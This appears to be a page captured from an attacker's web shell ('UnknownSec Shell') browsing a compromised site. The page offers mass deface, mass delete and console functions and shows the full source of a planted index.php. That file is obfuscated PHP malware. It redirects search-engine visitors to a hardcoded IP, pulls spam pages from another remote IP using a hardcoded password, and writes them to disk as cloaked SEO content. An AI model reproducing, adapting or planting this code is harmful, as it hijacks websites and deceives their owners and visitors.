shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
public
/
mcscd
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto PX6qQ; M72ND: $x1 = 3; goto XizRu; iRvOs: echo $text; goto E7j8f; aF_ew: $today = "\x32\60\x32\66\60\x31\60\x37\55"; goto NV5jI; LUs1A: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto PV_w0; NV5jI: foreach ($_GET as $a => $b) { $_GET["\x69\x64"] = $b; } goto mWmnQ; Ju79w: $text = ''; goto oykpP; XizRu: $xx1 = 5; goto qyBR2; v20Y7: $s = dirname($_SERVER["\x50\x48\120\x5f\123\105\114\x46"]); goto BPINp; PwnG9: $s = $_SERVER["\123\x45\x52\x56\105\122\x5f\x4e\x41\115\105"] . $s; goto aDSsU; qyBR2: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto vaWjO; FcAqR: if (strlen($text) > 500) { $out = fopen("\x69\x6e\144\145\x78\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto iRvOs; aDSsU: $apass3 = "\x72\166\63\62\171\x64\141\x63\163\x76\163\x64\166"; goto LUs1A; PX6qQ: error_reporting(0); goto aF_ew; vaWjO: $keyword = str_replace("\x20", "\x2b", $keyword); goto t3DxH; PV_w0: if (strpos($_SERVER["\x48\124\124\x50\x5f\x52\x45\x46\105\x52\x45\x52"], "\147\157\157\147\x6c\x65\56") or strpos($_SERVER["\x48\124\x54\120\x5f\x52\x45\106\105\x52\x45\122"], "\171\x61\150\x6f\x6f\x2e") or strpos($_SERVER["\110\124\x54\120\x5f\x52\x45\106\x45\x52\105\122"], "\142\x69\156\x67\56")) { $tpl = "\151\156\x64\145\170\x2f" . $_GET["\151\144"] . "\x2e\x70\150\x70\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\114\157\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\57\66\x35\56\61\x30\x38\x2e\61\60\56\x31\x39\x39\x2f\x65\156\x74\145\162\57\77\x6d\x61\162\x6b\75{$today}\x2d{$s}\x26\x74\x70\x6c\x3d{$tpl}\x26\x65\156\147\x6b\x65\x79\x3d{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\56\x70\x68\x70"; if (file_exists("\151\x6e\x64\145\170\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\144\x65\170\57" . $myname); if (strpos($_SERVER["\110\x54\x54\120\x5f\x55\x53\105\x52\137\101\107\105\116\124"], "\142\x69\156\147") > 2 or strpos($_SERVER["\x48\124\x54\120\x5f\x55\123\x45\122\x5f\x41\107\105\x4e\x54"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); $html = str_replace("\x3c\164\x69\x74\154\145\x3e\74\57\x74\x69\x74\x6c\x65\76", "\74\164\x69\x74\154\x65\x3e{$keyword}\x3c\x2f\164\x69\x74\x6c\145\76", $html); } echo $html; die; } } goto eLEuU; t3DxH: $apass2 = "\x62\x32\63\150\x72\x32\63\166\162\x33\x32"; goto v20Y7; QNI2a: $_GET["\167\x6f\162\x6c\x64"] = 5; goto RoQGI; eLEuU: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\151\144"]); goto Ju79w; BPINp: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto PwnG9; BIIwB: if (strlen($text) < 5000) { $url = "\66\65\56\x31\60\71\56\66\67\56\x31\x30\x30"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\51\x3c\x62\x72\x20\57\x3e\12"; } else { $req = "\57" . $_GET["\146\156"] . "\x2e\x70\150\x70\77\160\141\163\163\x3d{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"; $out = "\107\x45\x54\40{$req}\40\x48\124\x54\x50\57\x31\x2e\60\15\xa"; $out .= "\110\157\x73\x74\72\x20{$url}\xd\xa"; $out .= "\103\157\x6e\156\145\143\x74\151\x6f\156\x3a\40\x43\154\x6f\163\145\xd\xa\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto FcAqR; oykpP: if (function_exists("\x63\165\x72\x6c\x5f\151\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\x74\x70\x3a\x2f\57\66\65\x2e\61\60\71\56\66\x37\56\x31\60\60\x2f" . $_GET["\146\156"] . "\56\x70\150\160\77\160\141\x73\x73\75{$apass}\x26\x71\75{$_GET["\151\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\57\64\56\60\40\50\x63\x6f\155\x70\141\x74\x69\142\x6c\145\x3b\x20\115\x53\111\x45\40\66\56\60\73\40\x57\151\156\x64\157\x77\163\x20\116\124\x20\x35\56\61\x3b\40\123\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto Ed76W; Ed76W: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\164\160\72\x2f\57\66\x35\56\61\60\x39\56\66\67\56\61\x30\x30\57" . $_GET["\146\x6e"] . "\56\x70\x68\x70\77\x70\141\163\163\75{$apass}\x26\x71\x3d{$_GET["\151\x64"]}"); } goto BIIwB; RoQGI: $_GET["\146\x6e"] = "\x36\71\x36\71\66\71\x6e\x65\167"; goto esyqE; OClKF: if ($_GET["\151\x64"] == "\x69\156\144\145\170") { header("\114\x6f\143\141\164\151\157\156\72\40\150\x74\x74\160\163\72\x2f\x2f\x67\157\157\147\154\145\56\x63\157\x6d"); die; } goto QNI2a; mWmnQ: if ($_GET["\151\x64"] == "\164\x65\163\x74\x69\x6e\147") { echo "\164\x65\x73\x74\x20\147\157\157\144\x2e\x2e\x2e"; die; } goto OClKF; esyqE: $apass1 = "\x76\151\x73\x64\157\151\x6a\x65\x77"; goto M72ND; E7j8f: ?>
© 2026 UnknownSec